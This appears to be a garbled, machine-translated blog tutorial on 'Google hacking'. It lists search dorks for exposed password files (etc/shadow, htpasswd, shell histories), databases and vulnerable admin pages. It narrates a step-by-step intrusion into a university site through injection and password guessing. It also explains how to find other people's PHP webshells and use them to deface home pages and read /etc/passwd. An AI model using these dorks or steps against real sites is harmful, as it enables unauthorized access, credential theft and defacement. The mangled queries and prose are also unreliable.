Google Hacking wasn’t really new. At the time, the technology wasn’t really taken seriously, and webshell and all that stuff didn’t really have much practical use. Google Hacking is not that simple…
A simple implementation of Google Hacking
Using some of the syntax in Google can give us a lot more information (and certainly give those who are used to attacking more of what they want), but here’s a look at some of the common syntax.
intext:
This is the web page in the body content of a character as a search criteria, for example in Google input: intext: web, will return all in the body of the web page contains “web” pages.
allintext:
Use the same method as intext.
intitle:
Similar to the intext above, searching for the character we are looking for in the title of the page, for example: intitle: security angel, will return all pages containing “security angel” in the title of the page. Similarly, allintitle is similar to intitle.
cache:
Search Google’s cache of content and sometimes you’ll find something good.
define:
Search for the definition of a term. Searching: define: hacker returns the definition of hacker.
filetype:
This is one of the most important things I recommend, whether it’s a net attack or searching for specific types of files, as we’ll talk about later. For example, if you enter iletype: doc, all file urls ending in doc are returned. Of course, if you go to.bak,.MDB, or.Inc, you might get more information.
info:
Find some basic information about a specified site.
inurl:
Searches to see if the character we specify exists in the URL. For example, typing: inurl: admin returns N connections similar to this: www.xxx.com/xxx/admin. With…
link:
For example, searching for: inurl: www.4ngel.net returns all urls linked to www.4ngel.net.
site:
This is also useful, for example: site:www.4ngel.net. This will return all urls associated with the 4ngel.net site.
Oh, and there are some other symbols that are also useful:
+ list words that Google might ignore as search scope
– Ignore a word
To agree with words
. Single wildcard
* Wildcard, which can represent multiple letters
“” Precise query
## Let’s start with the practical applications
The following is a Google search, and for a malicious attacker, the password file is probably the most interesting. Because of its powerful search capabilities, Google often discloses some sensitive information to them. Google the following:
Intitle :"index of" etc intitle:"index of". Sh_history intitle:"index of". Bash_history intitle:"index of" passwd LST intitle:"index of" pwd.db intitle:"index of" etc/shadow intitle:"index of" SPWD Passwd intitle:"index of" htpasswd "# -FrontPage-" inurl:service.pwdCopy the codeSometimes important password files are left unprotected on the Internet for a variety of reasons, and if obtained by someone with ulterior motives, it can be very harmful. You can also use Google to search for programs with vulnerabilities. For example, ZeroBoard discovered a file code leak vulnerability some time ago. You can use Google to find sites that use this program on the Internet:
Intext: ZeroBoard filetype: PHP
Or use:
inurlutlogin.php? _zb_path= site:.jp
To find the page we need. Phpmyadmin is a set of powerful database operation software, some sites due to configuration error, we can not use the password directly to phpMyadmin operation, we can use Google search there is such a vulnerability of the program URL:
intitle:phpmyadmin intext:Create new database
Remember, http://www.xxx.com/_vti_bin/.. % 5… ystem32/cmd.exe? Dir? Google around and you’ll probably find a lot of vintage machines. We can also use this to find pages with other CGI bugs.
allinurl:winnt system32
We’ve briefly mentioned that you can use Google to search for database files, using some syntax to accurately search for more things (Access databases, MSSQL, mysql connection files, etc.). Here’s an example:
Allinurl: BBS data fileType: MDB inurl:database filetype: Inc conn inurl:data filetype: MDBCopy the codeIntitle :”index of” data // This is often the case on some incorrectly configured Apache + Win32 servers, as above, we can also use Google to find background.
The use of Google is completely possible to a site information collection and penetration, let’s use Google to test a specific site.
Start with Google and take a look at the basics of the site (some details are omitted) :
site:xxxx.com
From the information returned, find the domain names of several departments of the university:
http://a1.xxxx.com http://a2.xxxx.com http://a3.xxxx.com http://a4.xxxx.comCopy the codeBy the way, it’s on a different server. The school can have many good data commonly, see what good thing to have first not.
site:xxxx.com filetype:doc
I get N good doc’s.
First look for the site’s management background address:
Site:xxxx.com intext: management
site:xxxx.com inurl:login
Site:xxxx.com intitle: management
More than 2 management background addresses:
A2.xxxx.com/sys/admin_l… A3.xxxx.com: 88 / _admin/logi…
Not bad, look at what is running on the server:
Filetype :asp site:a2.xxxx.com filetype: PHP site:a2.xxxx.com filetype:aspx site:a3.xxxx.com Filetype: asp site:... .Copy the codeA2 server should be using IIS, above the use of asp whole site application, there is a PHP forum a3 server is also IIS, ASPX + ASP. Web applications should be self-developed. See if you can find any public FTP accounts:
site:a2.xxxx.com intext:ftp://*:*
Copy the codeI didn’t find anything of value. Let’s see if there are any upload bugs:
Site:a2.xxxx.com inurl: the file site:a3.xxxx.com inurl: the loadCopy the codeA page for uploading files was found on a2:
http://a2.xxxx.com/sys/uploadfile.aspCopy the codeI looked at it with IE, but I had no access. Try an injection,
site:a2.xxxx.com filetype:aspCopy the codeGet N asp page address, physical work let the software do it, this program obviously did not do anything to prevent injection, Dbowner permission, although not high but enough, back a shell does not like, and it seems that the size of the database is not small, directly put the web administrator password burst out again, MD5 encryption. General school site password is more regular, usually is a domain name + telephone deformation, with Google fix it.
Site:xxxx.com // get N secondary domain names site:xxxx.com intext:*@xxxx.com // get N email addresses, and the name of the owner of the mailbox etcCopy the codeMake a dictionary of information, hang up and run slowly. After a while, four accounts popped up, two for the student union, one for the administrator, and one possibly for a teacher. Land on:
Name: indicates the website administratorCopy the codePass :a2xxxx7619 // That is, the domain name +4 digits.
During this period of time, I have looked at some foreign Research sites of Google hack. In fact, they are almost the flexible use of some basic syntax, or with a certain script vulnerability, which mainly depends on personal flexible thinking. Foreign for Google hack prevention is not a lot, so we still point to it, do not go to destroy, ha ha. For some network administrators running Apache on Win should pay more attention to this aspect, an intitle:index of almost all out.
1. Search and usephp webshell
intitle:"php shell*" "Enable stderr" filetype:phpCopy the code(Note: intitle – Web page title Enable stderr – fileType – short for UNIX standard Output and standard Error) In search results, you can find many Web shells that execute commands directly on the machine. If you find PHPSHELL that doesn’t use it, if you’re not familiar with UNIX, check out the LIST. I won’t go into details here. It should be noted that some of the foreign PHPSHELL we search here will use UNIX commands, which are all functions called by system (in fact, baidu and other search engines can be used, but the content of the search is different). This PHPWEBSHELL can be directly Echo(common Unix command). The home page is fixed in one sentence:
Echo "summon" > index.jspCopy the codeNow look at the home page, we’ve changed it to: “Call”.
We can also use WGET to upload a file (such as the leaf you want to replace). Then execute Command type cat file > index.html or echo “” > file
echo "test" >> fileCopy the codeSuch a strip out, the site home page was successfully replaced. The same thing works
uname -a; cat /etc/passwdCopy the codeNote, however, that some WEBSHELL programs have problems and will not execute.
2. Search for INC sensitive information
Fill in the Google search box with:
Code:. Org filetype: incCopy the code